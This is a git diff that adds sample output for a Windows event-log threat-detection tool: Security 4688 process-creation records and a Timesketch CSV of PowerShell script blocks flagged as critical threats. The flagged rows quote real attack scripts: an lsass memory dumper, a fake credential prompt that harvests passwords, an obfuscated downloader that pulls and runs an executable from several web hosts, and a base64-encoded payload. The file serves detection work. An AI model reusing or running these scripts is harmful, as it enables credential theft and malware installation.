+ S-1-5-18
+ WIN-77LTAPHIQ1R$
+ EXAMPLE
+ 0x3e7
+ 0xae8
+ C:\Windows\System32\wbem\WmiPrvSE.exe
+ %%1936
+ 0x248
+
+
+"
+2019-03-19T04:02:07.445773+04:00,1552953727.445773,4688,C:\Windows\System32\wbem\WmiPrvSE.exe,WIN-77LTAPHIQ1R$,None,"
+
+
+
+
+ 4688
+ 1
+ 0
+ 13312
+ 0
+ 0x8020000000000000
+
+
+ 566844
+
+
+
+
+ Security
+ WIN-77LTAPHIQ1R.example.corp
+
+
+
+
+ S-1-5-18
+ WIN-77LTAPHIQ1R$
+ EXAMPLE
+ 0x3e7
+ 0x3b4
+ C:\Windows\System32\wbem\WmiPrvSE.exe
+ %%1936
+ 0x248
+
+
+"
+2019-03-19T04:02:04.367441+04:00,1552953724.367441,4688,C:\Windows\System32\tasklist.exe,WIN-77LTAPHIQ1R$,None,"
+
+
+
+
+ 4688
+ 1
+ 0
+ 13312
+ 0
+ 0x8020000000000000
+
+
+ 566839
+
+
+
+
+ Security
+ WIN-77LTAPHIQ1R.example.corp
+
+
+
+
+ S-1-5-18
+ WIN-77LTAPHIQ1R$
+ EXAMPLE
+ 0x3e7
+ 0x970
+ C:\Windows\System32\tasklist.exe
+ %%1936
+ 0xbcc
+
+
+"
+2019-03-19T04:02:04.351252+04:00,1552953724.351252,4688,C:\Windows\System32\conhost.exe,WIN-77LTAPHIQ1R$,None,"
+
+
+
+
+ 4688
+ 1
+ 0
+ 13312
+ 0
+ 0x8020000000000000
+
+
+ 566838
+
+
+
+
+ Security
+ WIN-77LTAPHIQ1R.example.corp
+
+
+
+
+ S-1-5-18
+ WIN-77LTAPHIQ1R$
+ EXAMPLE
+ 0x3e7
+ 0xebc
+ C:\Windows\System32\conhost.exe
+ %%1936
+ 0xbcc
+
+
+"
+2019-03-19T04:02:04.335561+04:00,1552953724.335561,4688,C:\Windows\System32\cmd.exe,WIN-77LTAPHIQ1R$,None,"
+
+
+
+
+ 4688
+ 1
+ 0
+ 13312
+ 0
+ 0x8020000000000000
+
+
+ 566837
+
+
+
+
+ Security
+ WIN-77LTAPHIQ1R.example.corp
+
+
+
+
+ S-1-5-18
+ WIN-77LTAPHIQ1R$
+ EXAMPLE
+ 0x3e7
+ 0xbcc
+ C:\Windows\System32\cmd.exe
+ %%1936
+ 0x33c
+
+
+"
+1601-01-01T04:00:00+04:00,-11644473600.0,4688,C:\Windows\System32\conhost.exe,IEWIN7$,None,"
+
+
+
+
+ 4688
+ 1
+ 0
+ 13312
+ 0
+ 0x8020000000000000
+
+
+ 18208
+
+
+
+
+ Security
+ IEWIN7
+
+
+
+
+ S-1-5-18
+ IEWIN7$
+ WORKGROUP
+ 0x3e7
+ 0x8dc
+ C:\Windows\System32\conhost.exe
+ %%1936
+ 0x188
+
+
+"
+2019-05-11T21:10:10.904945+04:00,1557594610.904945,4688,C:\Windows\System32\cmd.exe,IEWIN7$,None,"
+
+
+
+
+ 4688
+ 1
+ 0
+ 13312
+ 0
+ 0x8020000000000000
+
+
+ 18207
+
+
+
+
+ Security
+ IEWIN7
+
+
+
+
+ S-1-5-18
+ IEWIN7$
+ WORKGROUP
+ 0x3e7
+ 0xc74
+ C:\Windows\System32\cmd.exe
+ %%1936
+ 0x4f0
+
+
+"
+2019-05-11T21:10:10.889320+04:00,1557594610.88932,4688,C:\Windows\System32\wusa.exe,IEWIN7$,None,"
+
+
+
+
+ 4688
+ 1
+ 0
+ 13312
+ 0
+ 0x8020000000000000
+
+
+ 18205
+
+
+
+
+ Security
+ IEWIN7
+
+
+
+
+ S-1-5-18
+ IEWIN7$
+ WORKGROUP
+ 0x3e7
+ 0x5b0
+ C:\Windows\System32\wusa.exe
+ %%1937
+ 0x4f0
+
+
+"
+2019-05-11T21:10:10.826820+04:00,1557594610.82682,4688,C:\Windows\System32\dllhost.exe,IEWIN7$,None,"
+
+
+
+
+ 4688
+ 1
+ 0
+ 13312
+ 0
+ 0x8020000000000000
+
+
+ 18204
+
+
+
+
+ Security
+ IEWIN7
+
+
+
+
+ S-1-5-18
+ IEWIN7$
+ WORKGROUP
+ 0x3e7
+ 0x27c
+ C:\Windows\System32\dllhost.exe
+ %%1936
+ 0x258
+
+
+"
+2019-05-11T21:10:10.795570+04:00,1557594610.79557,4688,C:\Windows\System32\dllhost.exe,IEWIN7$,None,"
+
+
+
+
+ 4688
+ 1
+ 0
+ 13312
+ 0
+ 0x8020000000000000
+
+
+ 18201
+
+
+
+
+ Security
+ IEWIN7
+
+
+
+
+ S-1-5-18
+ IEWIN7$
+ WORKGROUP
+ 0x3e7
+ 0xec8
+ C:\Windows\System32\dllhost.exe
+ %%1936
+ 0x258
+
+
+"
+2019-05-11T21:10:10.654945+04:00,1557594610.654945,4688,C:\Windows\System32\consent.exe,IEWIN7$,None,"
+
+
+
+
+ 4688
+ 1
+ 0
+ 13312
+ 0
+ 0x8020000000000000
+
+
+ 18198
+
+
+
+
+ Security
+ IEWIN7
+
+
+
+
+ S-1-5-18
+ IEWIN7$
+ WORKGROUP
+ 0x3e7
+ 0x7f0
+ C:\Windows\System32\consent.exe
+ %%1936
+ 0x3c8
+
+
+"
+2019-05-11T21:10:10.623695+04:00,1557594610.623695,4688,C:\Windows\System32\wusa.exe,IEUser,None,"
+
+
+
+
+ 4688
+ 1
+ 0
+ 13312
+ 0
+ 0x8020000000000000
+
+
+ 18197
+
+
+
+
+ Security
+ IEWIN7
+
+
+
+
+ S-1-5-21-3583694148-1414552638-2922671848-1000
+ IEUser
+ IEWIN7
+ 0x13765
+ 0x628
+ C:\Windows\System32\wusa.exe
+ %%1938
+ 0x4f0
+
+
+"
+2019-05-11T21:10:10.608070+04:00,1557594610.60807,4688,C:\Python27\python.exe,IEUser,None,"
+
+
+
+
+ 4688
+ 1
+ 0
+ 13312
+ 0
+ 0x8020000000000000
+
+
+ 18196
+
+
+
+
+ Security
+ IEWIN7
+
+
+
+
+ S-1-5-21-3583694148-1414552638-2922671848-1000
+ IEUser
+ IEWIN7
+ 0x13765
+ 0x4f0
+ C:\Python27\python.exe
+ %%1938
+ 0x12c
+
+
+"
+2019-03-18T15:27:05.455663+04:00,1552908425.455663,4688,C:\Windows\System32\wbem\WMIC.exe,user01,None,"
+
+
+
+
+ 4688
+ 1
+ 0
+ 13312
+ 0
+ 0x8020000000000000
+
+
+ 433308
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-21-1587066498-1489273250-1035260531-1106
+ user01
+ EXAMPLE
+ 0x18a7875
+ 0x44c
+ C:\Windows\System32\wbem\WMIC.exe
+ %%1936
+ 0x86c
+
+
+"
+2019-02-13T22:05:06.665634+04:00,1550081106.665634,4688,C:\Windows\System32\AtBroker.exe,PC01$,None,"
+
+
+
+
+ 4688
+ 1
+ 0
+ 13312
+ 0
+ 0x8020000000000000
+
+
+ 227784
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-18
+ PC01$
+ EXAMPLE
+ 0x3e7
+ 0x7f0
+ C:\Windows\System32\AtBroker.exe
+ %%1936
+ 0xdec
+
+
+"
+2019-02-13T22:05:06.585519+04:00,1550081106.585519,4688,C:\Windows\System32\rdpclip.exe,PC01$,None,"
+
+
+
+
+ 4688
+ 1
+ 0
+ 13312
+ 0
+ 0x8020000000000000
+
+
+ 227783
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-20
+ PC01$
+ EXAMPLE
+ 0x3e4
+ 0xa1c
+ C:\Windows\System32\rdpclip.exe
+ %%1936
+ 0x500
+
+
+"
+2019-02-13T22:05:05.453892+04:00,1550081105.453892,4688,C:\Windows\System32\TSTheme.exe,PC01$,None,"
+
+
+
+
+ 4688
+ 1
+ 0
+ 13312
+ 0
+ 0x8020000000000000
+
+
+ 227776
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-18
+ PC01$
+ EXAMPLE
+ 0x3e7
+ 0x9fc
+ C:\Windows\System32\TSTheme.exe
+ %%1936
+ 0x278
+
+
+"
+2019-02-13T22:05:05.253604+04:00,1550081105.253604,4688,C:\Windows\System32\LogonUI.exe,PC01$,None,"
+
+
+
+
+ 4688
+ 1
+ 0
+ 13312
+ 0
+ 0x8020000000000000
+
+
+ 227775
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-18
+ PC01$
+ EXAMPLE
+ 0x3e7
+ 0xce0
+ C:\Windows\System32\LogonUI.exe
+ %%1936
+ 0x768
+
+
+"
+2019-02-13T22:05:05.123416+04:00,1550081105.123416,4688,C:\Windows\System32\winlogon.exe,PC01$,None,"
+
+
+
+
+ 4688
+ 1
+ 0
+ 13312
+ 0
+ 0x8020000000000000
+
+
+ 227774
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-18
+ PC01$
+ EXAMPLE
+ 0x3e7
+ 0x768
+ C:\Windows\System32\winlogon.exe
+ %%1936
+ 0x62c
+
+
+"
+2019-02-13T22:05:04.873056+04:00,1550081104.873056,4688,C:\Windows\System32\csrss.exe,PC01$,None,"
+
+
+
+
+ 4688
+ 1
+ 0
+ 13312
+ 0
+ 0x8020000000000000
+
+
+ 227773
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-18
+ PC01$
+ EXAMPLE
+ 0x3e7
+ 0xadc
+ C:\Windows\System32\csrss.exe
+ %%1936
+ 0x62c
+
+
+"
+2019-02-13T22:05:04.802956+04:00,1550081104.802956,4688,C:\Windows\System32\smss.exe,PC01$,None,"
+
+
+
+
+ 4688
+ 1
+ 0
+ 13312
+ 0
+ 0x8020000000000000
+
+
+ 227772
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-18
+ PC01$
+ EXAMPLE
+ 0x3e7
+ 0x62c
+ C:\Windows\System32\smss.exe
+ %%1936
+ 0x124
+
+
+"
+2019-02-13T22:05:01.037541+04:00,1550081101.037541,4688,C:\Windows\System32\rundll32.exe,PC01$,None,"
+
+
+
+
+ 4688
+ 1
+ 0
+ 13312
+ 0
+ 0x8020000000000000
+
+
+ 227769
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-18
+ PC01$
+ EXAMPLE
+ 0x3e7
+ 0x410
+ C:\Windows\System32\rundll32.exe
+ %%1936
+ 0x278
+
+
+"
+2019-02-13T22:04:57.862976+04:00,1550081097.862976,4688,C:\Windows\System32\LogonUI.exe,PC01$,None,"
+
+
+
+
+ 4688
+ 1
+ 0
+ 13312
+ 0
+ 0x8020000000000000
+
+
+ 227751
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-18
+ PC01$
+ EXAMPLE
+ 0x3e7
+ 0xc70
+ C:\Windows\System32\LogonUI.exe
+ %%1936
+ 0x4b8
+
+
+"
+2019-02-13T22:04:57.672703+04:00,1550081097.672703,4688,C:\Windows\System32\winlogon.exe,PC01$,None,"
+
+
+
+
+ 4688
+ 1
+ 0
+ 13312
+ 0
+ 0x8020000000000000
+
+
+ 227750
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-18
+ PC01$
+ EXAMPLE
+ 0x3e7
+ 0x4b8
+ C:\Windows\System32\winlogon.exe
+ %%1936
+ 0x38c
+
+
+"
+2019-02-13T22:04:57.542516+04:00,1550081097.542516,4688,C:\Windows\System32\csrss.exe,PC01$,None,"
+
+
+
+
+ 4688
+ 1
+ 0
+ 13312
+ 0
+ 0x8020000000000000
+
+
+ 227749
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-18
+ PC01$
+ EXAMPLE
+ 0x3e7
+ 0x9d4
+ C:\Windows\System32\csrss.exe
+ %%1936
+ 0x38c
+
+
+"
+2019-02-13T22:04:57.462400+04:00,1550081097.4624,4688,C:\Windows\System32\smss.exe,PC01$,None,"
+
+
+
+
+ 4688
+ 1
+ 0
+ 13312
+ 0
+ 0x8020000000000000
+
+
+ 227748
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-18
+ PC01$
+ EXAMPLE
+ 0x3e7
+ 0x38c
+ C:\Windows\System32\smss.exe
+ %%1936
+ 0x124
+
+
+"
+2019-02-13T22:04:01.632120+04:00,1550081041.63212,4688,C:\Windows\System32\UI0Detect.exe,PC01$,None,"
+
+
+
+
+ 4688
+ 1
+ 0
+ 13312
+ 0
+ 0x8020000000000000
+
+
+ 227726
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-18
+ PC01$
+ EXAMPLE
+ 0x3e7
+ 0x934
+ C:\Windows\System32\UI0Detect.exe
+ %%1936
+ 0x990
+
+
+"
+2019-02-13T22:03:35.734882+04:00,1550081015.734882,4688,C:\Windows\System32\slui.exe,PC01$,None,"
+
+
+
+
+ 4688
+ 1
+ 0
+ 13312
+ 0
+ 0x8020000000000000
+
+
+ 227721
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-18
+ PC01$
+ EXAMPLE
+ 0x3e7
+ 0xa38
+ C:\Windows\System32\slui.exe
+ %%1936
+ 0x278
+
+
+"
+2019-02-13T22:03:28.338519+04:00,1550081008.338519,4688,C:\Users\user01\Desktop\plink.exe,user01,None,"
+
+
+
+
+ 4688
+ 1
+ 0
+ 13312
+ 0
+ 0x8020000000000000
+
+
+ 227714
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-21-1587066498-1489273250-1035260531-1106
+ user01
+ EXAMPLE
+ 0x2ed80
+ 0xcfc
+ C:\Users\user01\Desktop\plink.exe
+ %%1936
+ 0xe60
+
+
+"
+2019-02-13T22:02:19.518362+04:00,1550080939.518362,4688,C:\Windows\System32\AtBroker.exe,PC01$,None,"
+
+
+
+
+ 4688
+ 1
+ 0
+ 13312
+ 0
+ 0x8020000000000000
+
+
+ 227712
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-18
+ PC01$
+ EXAMPLE
+ 0x3e7
+ 0x250
+ C:\Windows\System32\AtBroker.exe
+ %%1936
+ 0x1d0
+
+
+"
+2019-02-13T22:01:47.602470+04:00,1550080907.60247,4688,C:\Windows\System32\TSTheme.exe,PC01$,None,"
+
+
+
+
+ 4688
+ 1
+ 0
+ 13312
+ 0
+ 0x8020000000000000
+
+
+ 227695
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-18
+ PC01$
+ EXAMPLE
+ 0x3e7
+ 0x1fc
+ C:\Windows\System32\TSTheme.exe
+ %%1936
+ 0x278
+
+
+"
+2021-12-07T21:33:14.919262+04:00,1638898394.919262,4688,C:\Windows\System32\svchost.exe,MSEDGEWIN10$,C:\Windows\System32\services.exe,"
+
+
+
+
+ 4688
+ 2
+ 0
+ 13312
+ 0
+ 0x8020000000000000
+
+
+ 329925
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-18
+ MSEDGEWIN10$
+ WORKGROUP
+ 0x3e7
+ 0x24e0
+ C:\Windows\System32\svchost.exe
+ %%1936
+ 0x274
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ C:\Windows\System32\services.exe
+ S-1-16-16384
+
+"
+2021-12-07T21:33:01.680326+04:00,1638898381.680326,4688,C:\Windows\System32\lsass.exe,IEUser,C:\Windows\System32\lsass.exe,"
+
+
+
+
+ 4688
+ 2
+ 0
+ 13312
+ 0
+ 0x8020000000000000
+
+
+ 329921
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-21-3461203602-4096304019-2269080069-1000
+ IEUser
+ MSEDGEWIN10
+ 0x16e3db3
+ 0x1494
+ C:\Windows\System32\lsass.exe
+ %%1936
+ 0x27c
+
+ S-1-5-18
+ MSEDGEWIN10$
+ WORKGROUP
+ 0x3e7
+ C:\Windows\System32\lsass.exe
+ S-1-16-16384
+
+"
+2021-12-07T21:33:01.680005+04:00,1638898381.680005,4688,C:\Windows\System32\conhost.exe,IEUser,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,"
+
+
+
+
+ 4688
+ 2
+ 0
+ 13312
+ 0
+ 0x8020000000000000
+
+
+ 329920
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-21-3461203602-4096304019-2269080069-1000
+ IEUser
+ MSEDGEWIN10
+ 0x16e3db3
+ 0x11e4
+ C:\Windows\System32\conhost.exe
+ %%1936
+ 0x17b8
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe
+ S-1-16-12288
+
+"
+2021-12-07T21:33:01.636384+04:00,1638898381.636384,4688,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,MSEDGEWIN10$,C:\Windows\System32\lsass.exe,"
+
+
+
+
+ 4688
+ 2
+ 0
+ 13312
+ 0
+ 0x8020000000000000
+
+
+ 329919
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-18
+ MSEDGEWIN10$
+ WORKGROUP
+ 0x3e7
+ 0x17b8
+ \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe
+ %%1936
+ 0x27c
+
+ S-1-0-0
+ IEUser
+ MSEDGEWIN10
+ 0x16e3db3
+ C:\Windows\System32\lsass.exe
+ S-1-16-12288
+
+"
+2021-12-07T21:33:01.474816+04:00,1638898381.474816,4688,C:\Windows\System32\svchost.exe,MSEDGEWIN10$,C:\Windows\System32\services.exe,"
+
+
+
+
+ 4688
+ 2
+ 0
+ 13312
+ 0
+ 0x8020000000000000
+
+
+ 329916
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-18
+ MSEDGEWIN10$
+ WORKGROUP
+ 0x3e7
+ 0x1bc4
+ C:\Windows\System32\svchost.exe
+ %%1936
+ 0x274
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ C:\Windows\System32\services.exe
+ S-1-16-16384
+
+"
+2021-12-07T21:33:01.409312+04:00,1638898381.409312,4688,\Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe,IEUser,C:\Windows\System32\cmd.exe,"
+
+
+
+
+ 4688
+ 2
+ 0
+ 13312
+ 0
+ 0x8020000000000000
+
+
+ 329914
+
+
+
+
+ Security
+ MSEDGEWIN10
+
+
+
+
+ S-1-5-21-3461203602-4096304019-2269080069-1000
+ IEUser
+ MSEDGEWIN10
+ 0x53ca2
+ 0x21a4
+ \Device\Mup\VBoxSvr\Users\bouss\Downloads\MalSeclogon-master\x64\Debug\MalSeclogon.exe
+ %%1937
+ 0x2480
+
+ S-1-0-0
+ -
+ -
+ 0x0
+ C:\Windows\System32\cmd.exe
+ S-1-16-12288
+
+"
+2022-05-01T08:42:06.656542+04:00,1651380126.656542,4688,C:\Windows\System32\notepad.exe,WIND10$,C:\Windows\System32\wbem\WmiPrvSE.exe,"
+
+
+
+
+ 4688
+ 2
+ 0
+ 13312
+ 0
+ 0x8020000000000000
+
+
+ 21374
+
+
+
+
+ Security
+ wind10.winlab.local
+
+
+
+
+ S-1-5-20
+ WIND10$
+ WINLAB
+ 0x3e4
+ 0x1dc
+ C:\Windows\System32\notepad.exe
+ %%1936
+ 0xe8c
+
+ S-1-0-0
+ Administrator
+ WINLAB.LOCAL
+ 0x82215a
+ C:\Windows\System32\wbem\WmiPrvSE.exe
+ S-1-16-12288
+
+"
diff --git a/source/samples/Sample_Report.xlsx b/source/samples/Sample_Report.xlsx
new file mode 100644
index 0000000..59cb16f
Binary files /dev/null and b/source/samples/Sample_Report.xlsx differ
diff --git a/source/samples/Sample_TimeSketch.csv b/source/samples/Sample_TimeSketch.csv
new file mode 100644
index 0000000..3d75da3
--- /dev/null
+++ b/source/samples/Sample_TimeSketch.csv
@@ -0,0 +1,41690 @@
+message,timestamp,datetime,timestamp_desc,Detection Domain,Severity,Event Description,Event ID,Original Event Log,Computer Name,Channel
+powershell script block - Found Suspicious PowerShell commands ,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,"Found Suspicious PowerShell commands that include (System.Management,.invoke,New-Object,New-Object,Remove-Item,del,-ErrorAction , -ErrorAction SilentlyContinue,get-process,Get-Process ,Get-Process,Get-Process lsass,invoke,IO.FileStream,join,MiniDumpWriteDump,Move-Item,new-object,Remove-Item,SilentlyContinue) , check event details ",4104,"
+
+
+
+
+ 4104
+ 1
+ 3
+ 2
+ 15
+ 0x0
+
+
+ 971
+
+
+
+
+ Microsoft-Windows-PowerShell/Operational
+ MSEDGEWIN10
+
+
+
+
+ 1
+ 1
+ function Memory($path)
+{
+
+
+ $Process = Get-Process lsass
+ $DumpFilePath = $path
+
+ $WER = [PSObject].Assembly.GetType('System.Management.Automation.WindowsErrorReporting')
+ $WERNativeMethods = $WER.GetNestedType('NativeMethods', 'NonPublic')
+ $Flags = [Reflection.BindingFlags] 'NonPublic, Static'
+ $MiniDumpWriteDump = $WERNativeMethods.GetMethod('MiniDumpWriteDump', $Flags)
+ $MiniDumpWithFullMemory = [UInt32] 2
+
+
+ #
+ $ProcessId = $Process.Id
+ $ProcessName = $Process.Name
+ $ProcessHandle = $Process.Handle
+ $ProcessFileName = "$($ProcessName).dmp"
+
+ $ProcessDumpPath = Join-Path $DumpFilePath $ProcessFileName
+
+ $FileStream = New-Object IO.FileStream($ProcessDumpPath, [IO.FileMode]::Create)
+
+ $Result = $MiniDumpWriteDump.Invoke($null, @($ProcessHandle,
+ $ProcessId,
+ $FileStream.SafeFileHandle,
+ $MiniDumpWithFullMemory,
+ [IntPtr]::Zero,
+ [IntPtr]::Zero,
+ [IntPtr]::Zero))
+
+ $FileStream.Close()
+
+ if (-not $Result)
+ {
+ $Exception = New-Object ComponentModel.Win32Exception
+ $ExceptionMessage = "$($Exception.Message) ($($ProcessName):$($ProcessId))"
+
+ # Remove any partially written dump files. For example, a partial dump will be written
+ # in the case when 32-bit PowerShell tries to dump a 64-bit process.
+ Remove-Item $ProcessDumpPath -ErrorAction SilentlyContinue
+
+ throw $ExceptionMessage
+ }
+ else
+ {
+ "Memdump complete!"
+ }
+
+}
+ 27f08bda-c330-419f-b83b-eb5c0f699930
+ C:\Users\Public\lsass_wer_ps.ps1
+
+",MSEDGEWIN10,Microsoft-Windows-PowerShell/Operational
+powershell script block - Found Suspicious PowerShell commands ,1568036117.258414,2019-09-09T17:35:17.258414+04:00,,Threat,Critical,"Found Suspicious PowerShell commands that include (Password,New-Object,New-Object,$env:UserName,add,invoke,new-object,.pass,PromptForCredential,select-object,System.DirectoryServices.AccountManagement) , check event details ",4104,"
+
+
+
+
+ 4104
+ 1
+ 3
+ 2
+ 15
+ 0x0
+
+
+ 1123
+
+
+
+
+ Microsoft-Windows-PowerShell/Operational
+ MSEDGEWIN10
+
+
+
+
+ 1
+ 1
+ function Invoke-LoginPrompt{
+$cred = $Host.ui.PromptForCredential("Windows Security", "Please enter user credentials", "$env:userdomain\$env:username","")
+$username = "$env:username"
+$domain = "$env:userdomain"
+$full = "$domain" + "\" + "$username"
+$password = $cred.GetNetworkCredential().password
+Add-Type -assemblyname System.DirectoryServices.AccountManagement
+$DS = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine)
+while($DS.ValidateCredentials("$full","$password") -ne $True){
+ $cred = $Host.ui.PromptForCredential("Windows Security", "Invalid Credentials, Please try again", "$env:userdomain\$env:username","")
+ $username = "$env:username"
+ $domain = "$env:userdomain"
+ $full = "$domain" + "\" + "$username"
+ $password = $cred.GetNetworkCredential().password
+ Add-Type -assemblyname System.DirectoryServices.AccountManagement
+ $DS = New-Object System.DirectoryServices.AccountManagement.PrincipalContext([System.DirectoryServices.AccountManagement.ContextType]::Machine)
+ $DS.ValidateCredentials("$full", "$password") | out-null
+ }
+ $output = $newcred = $cred.GetNetworkCredential() | select-object UserName, Domain, Password
+ $output
+ R{START_PROCESS}
+}
+Invoke-LoginPrompt
+ c7ca7056-b317-4fff-b796-05d8ef896dcd
+
+
+",MSEDGEWIN10,Microsoft-Windows-PowerShell/Operational
+powershell script block - Found Suspicious PowerShell commands ,1598418568.845521,2020-08-26T09:09:28.845521+04:00,,Threat,Critical,"Found Suspicious PowerShell commands that include (Net.WebClient,Net.WebClient,Net.WebClient,Net.WebClient,$env:TEMP\,char,-f , -Force,foreach,$Env:Temp\,Net.WebClient) , check event details ",4104,"
+
+
+
+
+ 4104
+ 1
+ 5
+ 2
+ 15
+ 0x0
+
+
+ 683
+
+
+
+
+ Microsoft-Windows-PowerShell/Operational
+ DESKTOP-RIPCLIP
+
+
+
+
+ 1
+ 1
+ $Va5w3n8=(('Q'+'2h')+('w9p'+'1'));&('ne'+'w-'+'item') $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::"SecURi`T`ypRO`T`oCOL" = ('t'+'ls'+'1'+('2, tl'+'s')+'11'+(', '+'tls'));$Depssu0 = (('D'+'yx')+('x'+'ur4g')+'x');$A74_j9r=('T'+'4'+('gf45'+'h'));$Fdkhtf_=$env:temp+(('{0}'+'word{'+'0}'+('2'+'01')+'9{0}') -F [CHAr]92)+$Depssu0+('.'+('ex'+'e'));$O39nj1p=('J6'+'9l'+('hm'+'h'));$Z8i525z=&('new-'+'obje'+'c'+'t') neT.WEbcLiENt;$Iwmfahs=(('h'+'ttp')+(':'+'//')+('q'+'u'+'anticaelectro'+'n'+'ic')+('s.com'+'/')+'w'+'p-'+'a'+('d'+'min')+'/'+'7A'+('Tr78'+'/*'+'htt')+('p'+'s:/')+('/r'+'e')+'be'+('l'+'co')+'m'+'.'+('ch/'+'pi'+'c')+('ture'+'_')+('l'+'ibra'+'ry/bbCt')+('l'+'S/')+('*ht'+'tp'+'s:/')+('/re'+'al')+'e'+'s'+('tate'+'a')+('gen'+'t')+'te'+('am.co'+'m')+'/'+('163/Q'+'T')+'d'+('/'+'*ht'+'tps:')+'//'+('w'+'ww.')+('ri'+'dd')+('hi'+'display.'+'c'+'o')+'m/'+'r'+'id'+'d'+('hi'+'/1pKY/'+'*htt')+'p'+(':'+'//')+('radi'+'osu'+'bmit.com/'+'sear')+('ch_'+'tes'+'t')+'/'+'p'+('/*'+'h')+('ttp'+':/')+'/'+('res'+'e')+'ar'+('ch'+'c')+'he'+'m'+('plu'+'s.'+'c')+('om/w'+'p-')+('a'+'dmin')+'/1'+('OC'+'C')+'/'+('*http:'+'/')+('/s'+'zymo')+('ns'+'zyp')+'er'+('sk'+'i')+('.'+'pl/a')+'ss'+('ets/'+'p')+'k/')."S`Plit"([char]42);$Zxnbryr=(('Dp'+'z9')+'4'+'a6');foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z."d`OWN`load`FIlE"($Mqku5a2, $Fdkhtf_);$Lt8bjj7=('Ln'+('wp'+'ag')+'m');If ((.('Get-I'+'t'+'em') $Fdkhtf_)."le`NgTH" -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .('Invo'+'ke'+'-Item')($Fdkhtf_);$Nfgrgu9=(('Qj6'+'bs')+'x'+'n');break;$D7ypgo1=('Bv'+('e'+'bc')+'k0')}}catch{}}$Gmk6zmk=(('Z2x'+'aaj')+'0')
+ fdd51159-9602-40cb-839d-c31039ebbc3a
+
+
+",DESKTOP-RIPCLIP,Microsoft-Windows-PowerShell/Operational
+powershell script block - Found Suspicious PowerShell commands ,1568036109.31523,2019-09-09T17:35:09.315230+04:00,,Threat,Critical,"Found Suspicious PowerShell commands that include (FromBase64String,Base64,New-Object,New-Object,new-object,readtoend,system.io.streamreader) , check event details ",4104,"
+
+
+
+
+ 4104
+ 1
+ 3
+ 2
+ 15
+ 0x0
+
+
+ 1122
+
+
+
+
+ Microsoft-Windows-PowerShell/Operational
+ MSEDGEWIN10
+
+
+
+
+ 1
+ 1
+ &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String('H4sIAAlVdl0CA81UXW/aMBR996+4svJANJIfgNQHBNs6aaWIsO2hnSbXuaVeEzuyHdKI8d93YwIDTUJlfVkeLPme+3F87lEeay29Mho+6bV5xuSzWSk9t6as/IZF0mIOVxBdG+fTWqU74IOxEwJQeyWKAf+mdG4aBxnK2irf8iHweYHCIVAKWqgdHfJQ4bqECPV61AG5KYXS94e7FiXyIecxi/ZXYsBPcRbtyk6QXYiwx7ooAtJH4B3w+3BGRx0q4VxjbHhfRy79iH6GnkLPR6+L030eG+d5smwrhIQiWD4UbSCXtc5jmU6VRemNbTO0ayXRpWMpTa39jdBihSX1Y9E0o2kzbJLbh5+UfUEtSa+0VJUoJoZEffGDuwuK+5qO/ffR6EbIJ6UxZs2TKnBArNKvolC58Pjn5W7Ag5C0i4NUPIZEI0RLW2O8YUDfv1uEDNcNhaORQ+h9420LYtXt7nVWCUzO2CXgZywT8FfZJmRebJ2u6u32CbP/Mwv1nM4aCE4c9AtM7RNNSCjeMogoUNW+U1NjszfUGWGph8OCKCdmJ8IX2s+M1BzCNOyOjHSQvu/OYLHJluPF8sd8cTt5n2VbtmV///R+A6HMO3IQBQAA'))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))
+ 37f6d110-cfdf-4118-8748-17638e258531
+
+
+",MSEDGEWIN10,Microsoft-Windows-PowerShell/Operational
